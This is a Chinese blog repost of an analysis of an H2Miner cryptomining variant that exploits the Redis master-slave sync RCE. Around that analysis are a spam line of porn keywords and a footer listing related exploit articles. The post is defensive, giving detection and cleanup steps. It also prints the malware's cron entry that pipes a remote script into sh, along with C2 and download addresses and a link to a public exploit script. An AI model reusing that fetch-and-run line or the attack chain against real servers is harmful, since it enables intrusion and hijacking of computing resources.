国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁(yè)
  2. >Toy博客

H2Miner變種,利用Redis漏洞入侵云服務(wù)器wa礦

2年前作者:Honker0分類(lèi):Toy博客閱讀(18)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了H2Miner變種,利用Redis漏洞入侵云服務(wù)器wa礦。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

H2Miner變種,最主要的特征是,入侵后 redis路徑下很明顯多了兩個(gè)可執(zhí)行的so文件,red2.so 和 exp_lin.so ;

H2Miner變種,利用Redis漏洞入侵云服務(wù)器wa礦

該變種利用Redis 4.x/5.x 主從同步命令執(zhí)行漏洞(CNVD-2019-21763)攻擊云服務(wù)器,檢測(cè)數(shù)據(jù)顯示該木馬活動(dòng)有明顯增長(zhǎng)。H2Miner變種木馬入侵后會(huì)下載挖礦木馬,通過(guò)安裝定時(shí)任務(wù)持久化,通過(guò)SSH復(fù)用連接進(jìn)行橫向移動(dòng)感染。

2Miner變種木馬入侵后會(huì)下載kinsingXXXXXXXXXX(10位隨機(jī)字符)木馬作為挖礦木馬kdevtmpfsi的維持進(jìn)程,并且通過(guò)安裝定時(shí)任務(wù)持久化、通過(guò)SSH復(fù)用連接進(jìn)行橫向移動(dòng)感染。H2Miner挖礦木馬會(huì)占用大量CPU資源進(jìn)行挖礦計(jì)算,可能導(dǎo)致業(yè)務(wù)系統(tǒng)崩潰,該挖礦木馬還會(huì)嘗試卸載云服務(wù)器的安全軟件。騰訊安全專(zhuān)家建議企業(yè)用戶(hù)按照以下步驟進(jìn)行自查以及處置:

1.Redis 非必要情況不要暴露在公網(wǎng),使用足夠強(qiáng)壯的Redis口令;

2.修改配置文件,限制訪問(wèn)Redis服務(wù)器的IP地址(bind 127.0.0.1或指定IP);

3.排查Redis路徑下是否殘留red2.so、exp_lin.so文件,查詢(xún)主機(jī)上是有否包含有kinsing(或kinsingXXXXXXXXXX)、kdevtmpfsi的文件或進(jìn)程,是否有包含“195.3.146.118”的定時(shí)任務(wù)。

以上步驟可確認(rèn)服務(wù)器是否被H2Miner挖礦木馬感染,如有發(fā)現(xiàn),可以刪除相關(guān)進(jìn)程文件及定時(shí)任務(wù)。

Redis 4.x/5.x 版本存在主從同步命令執(zhí)行漏洞(CNVD-2019-21763),攻擊者通過(guò)構(gòu)造特定的請(qǐng)求實(shí)現(xiàn)漏洞利用,成功利用漏洞可在目標(biāo)服務(wù)器上實(shí)現(xiàn)Getshell,該漏洞風(fēng)險(xiǎn)較高,且漏洞利用方式已被公開(kāi)。

(https://github.com/Ridter/redis-rce/blob/master/redis-rce.py)

由于Redis 4.x以及之后的版本,Redis新增了模塊功能,用戶(hù)可以通過(guò)外部拓展實(shí)現(xiàn)用戶(hù)需要的功能,這樣就可以在Redis中實(shí)現(xiàn)一個(gè)新的Redis命令。攻擊者利用此功能(由Redis的主機(jī)實(shí)例通過(guò)fullresync同步到從機(jī)),使被攻擊機(jī)加載惡意的模塊red2.so文件,從而實(shí)現(xiàn)遠(yuǎn)程命令執(zhí)行。

H2Miner變種,利用Redis漏洞入侵云服務(wù)器wa礦
ed2.so實(shí)現(xiàn)了shell命令的執(zhí)行功能,可以接受攻擊者指定的任意代碼。
H2Miner變種,利用Redis漏洞入侵云服務(wù)器wa礦
H2Miner變種,利用Redis漏洞入侵云服務(wù)器wa礦
隨后攻擊者通過(guò)執(zhí)行遠(yuǎn)程命令在Redis目錄(/www/server/redis/)中下載了三個(gè)可執(zhí)行文件并運(yùn)行,文件名為kinsing+“10個(gè)隨機(jī)字符”:

insinghoeF6X2YuD

kinsinghUvG9LNzhs

kinsingOtaaHxvErd

H2Miner變種,利用Redis漏洞入侵云服務(wù)器wa礦

對(duì)比發(fā)現(xiàn)三個(gè)文件其實(shí)相同,推測(cè)可能是由于重復(fù)入侵導(dǎo)致。該程序由GO語(yǔ)言開(kāi)發(fā),通過(guò)還原后的函數(shù)名進(jìn)行對(duì)比,可知其是H2Miner此前的kinsing文件變種,并且與http[:]//45.10.88.124/kinsing下載得到的文件一致。

kinsingXXXXXXXXXX在函數(shù)main_redisBrute中實(shí)現(xiàn)redis爆破攻擊功能。

H2Miner變種,利用Redis漏洞入侵云服務(wù)器wa礦

該樣本會(huì)繼續(xù)下載門(mén)羅幣挖礦木馬/tmp/kdevtmpfsi啟動(dòng)挖礦,導(dǎo)致大量CPU資源被占用,影響機(jī)器正常運(yùn)轉(zhuǎn)。

H2Miner變種,利用Redis漏洞入侵云服務(wù)器wa礦

下載http[:]//45.10.88.124/al.sh,嘗試卸載阿里云騎士和騰訊云鏡。

H2Miner變種,利用Redis漏洞入侵云服務(wù)器wa礦

下載http[:]//45.10.88.124/cron.sh,安裝定時(shí)任務(wù):

“* * * * * $LDR http[:]//195.3.146.118/unk.sh | sh > /dev/null 2>&1”

H2Miner變種,利用Redis漏洞入侵云服務(wù)器wa礦

下載http[:]//45.10.88.124/spre.sh,嘗試?yán)肧SH連接復(fù)用進(jìn)行橫向移動(dòng):

H2Miner變種,利用Redis漏洞入侵云服務(wù)器wa礦

與C2地址93.189.46.81通信。

H2Miner變種,利用Redis漏洞入侵云服務(wù)器wa礦文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-507603.html

到了這里,關(guān)于H2Miner變種,利用Redis漏洞入侵云服務(wù)器wa礦的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶(hù)投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 不死馬的利用與克制(基于條件競(jìng)爭(zhēng))及變種不死馬

    不死馬的利用與克制(基于條件競(jìng)爭(zhēng))及變種不死馬

    不死馬即內(nèi)存馬,它會(huì)寫(xiě)進(jìn)進(jìn)程里,并且無(wú)限地在指定目錄中生成木馬文件 這里以PHP不死馬為例 測(cè)試代碼: 上面代碼即為最簡(jiǎn)單的不死馬,其目的是創(chuàng)建一個(gè)名為\\\".test.php\\\"的PHP文件,該文件包含一個(gè)帶有密碼驗(yàn)證的后門(mén),允許執(zhí)行任意PHP代碼。 關(guān)于代碼的詳細(xì)解釋?zhuān)?1、i

    2024年02月07日
    瀏覽(12)
  • 漏洞復(fù)現(xiàn)Influxdb,H2database,couchDB,ElasticSearch

    漏洞復(fù)現(xiàn)Influxdb,H2database,couchDB,ElasticSearch

    一、Influxdb - 未授權(quán)訪問(wèn) - Jwt 驗(yàn)證不當(dāng) 默認(rèn)端口: 8086 8088 influxdb是一款著名的時(shí)序數(shù)據(jù)庫(kù),其使用jwt作為鑒權(quán)方式。在用戶(hù)開(kāi)啟了認(rèn)證,但未設(shè)置參數(shù)shared - secret的情況下,jwt的認(rèn)證密鑰為空字符串,此時(shí)攻擊者可以偽造任意用戶(hù)身份在influxdb中執(zhí)行SQL語(yǔ)句。 1 、借助https

    2023年04月10日
    瀏覽(20)
  • 數(shù)據(jù)庫(kù)安全-H2 database&Elasticsearch&CouchDB&Influxdb漏洞復(fù)現(xiàn)

    數(shù)據(jù)庫(kù)安全-H2 database&Elasticsearch&CouchDB&Influxdb漏洞復(fù)現(xiàn)

    參考:influxdb CVE-2019-20933 靶場(chǎng)環(huán)境:vulhub 打開(kāi)靶場(chǎng)進(jìn)入環(huán)境: 訪問(wèn): 端口掃描: 默認(rèn)端口: 8086:用于客戶(hù)端和服務(wù)端交互的HTTP API 8088 :用于提供備份和恢復(fù)的RPC服務(wù) influxdb 是一款著名的時(shí)序數(shù)據(jù)庫(kù),其使用 jwt 作為鑒權(quán)方式。在用戶(hù)開(kāi)啟了認(rèn)證, 但未設(shè)置參數(shù) shared-s

    2024年02月06日
    瀏覽(24)
  • 黑客入侵:福特汽車(chē)Sync3車(chē)機(jī)存在漏洞,黑客入侵可抹除系統(tǒng)數(shù)據(jù)

    黑客入侵:福特汽車(chē)Sync3車(chē)機(jī)存在漏洞,黑客入侵可抹除系統(tǒng)數(shù)據(jù)

    據(jù)福特汽車(chē)公告,他們發(fā)現(xiàn)部分2021年至2022年車(chē)型的Sync3車(chē)機(jī)存在Wi-Fi漏洞,該漏洞可能被黑客利用來(lái)入侵并抹除車(chē)機(jī)內(nèi)的系統(tǒng)數(shù)據(jù)。這一漏洞源于福特車(chē)系中采用的WL18xx MCP驅(qū)動(dòng)程序的內(nèi)存緩沖區(qū)溢位漏洞,其漏洞編號(hào)為CVE-2023-29468。 這一發(fā)現(xiàn)引發(fā)了對(duì)車(chē)輛網(wǎng)絡(luò)安全的擔(dān)憂。隨

    2024年02月12日
    瀏覽(20)
  • Kali Linux利用MSF入侵安卓手機(jī)

    Kali Linux利用MSF入侵安卓手機(jī)

    Kali Linux利用MSF入侵安卓手機(jī) 一、什么是msf msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用來(lái)生成后門(mén)的軟件。 MSFvenom是Msfpayload和Msfencode的組合,將這兩個(gè)工具都放在一個(gè)Framework實(shí)例中。自2015年6月8日起,msfvenom替換了msfpayload和msfencode。 演示

    2024年02月10日
    瀏覽(25)
  • Sangfor華東天勇戰(zhàn)隊(duì):h2數(shù)據(jù)庫(kù)console命令執(zhí)行( CVE-2021-42392 漏洞)

    Sangfor華東天勇戰(zhàn)隊(duì):h2數(shù)據(jù)庫(kù)console命令執(zhí)行( CVE-2021-42392 漏洞)

    1.1.100 = H2 Console = 2.0.204 此處復(fù)現(xiàn)版本1.4.197 啟動(dòng)項(xiàng)目如下 在Driver Class中輸入javax.naming.InitialContext 在JDBCURL中輸入jndi注入惡意鏈接 生成鏈接命令: 因?yàn)轫?xiàng)目環(huán)境是jdk1.7,因此我們用1.7的jndi,其他版本均不生效 通過(guò)漏洞公布,可以看到是在org.h2.util.JdbcUtils.getConnection的javax.na

    2024年02月11日
    瀏覽(29)
  • 【應(yīng)急響應(yīng)】網(wǎng)站入侵篡改指南&Webshell內(nèi)存馬查殺&漏洞排查&時(shí)間分析

    【應(yīng)急響應(yīng)】網(wǎng)站入侵篡改指南&Webshell內(nèi)存馬查殺&漏洞排查&時(shí)間分析

    應(yīng)急響應(yīng): 1、抗拒絕服務(wù)攻擊防范應(yīng)對(duì)指南 2、勒索軟件防范應(yīng)對(duì)指南 3、釣魚(yú)郵件攻擊防范應(yīng)對(duì)指南 4、網(wǎng)頁(yè)篡改與后門(mén)攻擊防范應(yīng)對(duì)指南 5、網(wǎng)絡(luò)安全漏洞防范應(yīng)對(duì)指南 6、大規(guī)模數(shù)據(jù)泄露防范應(yīng)對(duì)指南 7、僵尸網(wǎng)絡(luò)感染防范應(yīng)對(duì)指南 8、APT攻擊入侵防范應(yīng)對(duì)指南 9、各種輔

    2024年01月20日
    瀏覽(22)
  • 服務(wù)攻防-數(shù)據(jù)庫(kù)安全-Influxdb&H2database&CouchDB&ElasticSearch數(shù)據(jù)庫(kù)漏洞復(fù)現(xiàn)

    服務(wù)攻防-數(shù)據(jù)庫(kù)安全-Influxdb&H2database&CouchDB&ElasticSearch數(shù)據(jù)庫(kù)漏洞復(fù)現(xiàn)

    目錄 一、Influxdb-未授權(quán)訪問(wèn)-Jwt 驗(yàn)證不當(dāng) 1、Infuxdb簡(jiǎn)介 2、安全問(wèn)題 3、漏洞復(fù)現(xiàn)? 二、H2database-未授權(quán)訪問(wèn)-配置不當(dāng) 1、H2database簡(jiǎn)介 2、安全問(wèn)題 3、漏洞復(fù)現(xiàn)? 三、CouchDB-權(quán)限繞過(guò)配合RCE-漏洞 1、CouchDB簡(jiǎn)介 2、安全問(wèn)題 3、漏洞復(fù)現(xiàn)? 四 、ElasticSearch-文件寫(xiě)入RCE-漏洞 1、Ela

    2024年02月16日
    瀏覽(20)
  • 【rpcbind漏洞111端口入侵實(shí)戰(zhàn)指南--關(guān)注紫靈小姐姐不踩坑】

    【rpcbind漏洞111端口入侵實(shí)戰(zhàn)指南--關(guān)注紫靈小姐姐不踩坑】

    111端口rpcbind漏洞 最近掃描一個(gè)內(nèi)網(wǎng)的ip,發(fā)現(xiàn)有一個(gè)不常見(jiàn)的端口開(kāi)著,服務(wù)是rpcbind,上網(wǎng)一查還真是有漏洞。 該漏洞可使攻擊者在遠(yuǎn)程rpcbind綁定主機(jī)上分配任意大小的內(nèi)存(每次攻擊最高可達(dá)4GB),除非進(jìn)程崩潰,或者管理員掛起/重啟rpcbind服務(wù),否則該內(nèi)存不會(huì)被釋放。

    2024年02月15日
    瀏覽(70)
  • 6-14漏洞利用-rpcbind漏洞利用

    6-14漏洞利用-rpcbind漏洞利用

    rpcbind介紹 通俗的來(lái)說(shuō),rpcbind是NFS中用來(lái)進(jìn)行消息通知的服務(wù)。 一般情況下rpcbind運(yùn)行在111、31端口。并且NFS配置開(kāi)啟 rpcbind_enable=“YES” 我們來(lái)探測(cè)當(dāng)前機(jī)器的開(kāi)放端口,一般開(kāi)啟了rpcbind,會(huì)有nfs網(wǎng)絡(luò)共享的功能,nfs端口是2049 探測(cè)目標(biāo)rpcbind 使用nmap -sV -p 111 IP地址 探測(cè)目標(biāo)

    2024年01月25日
    瀏覽(47)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包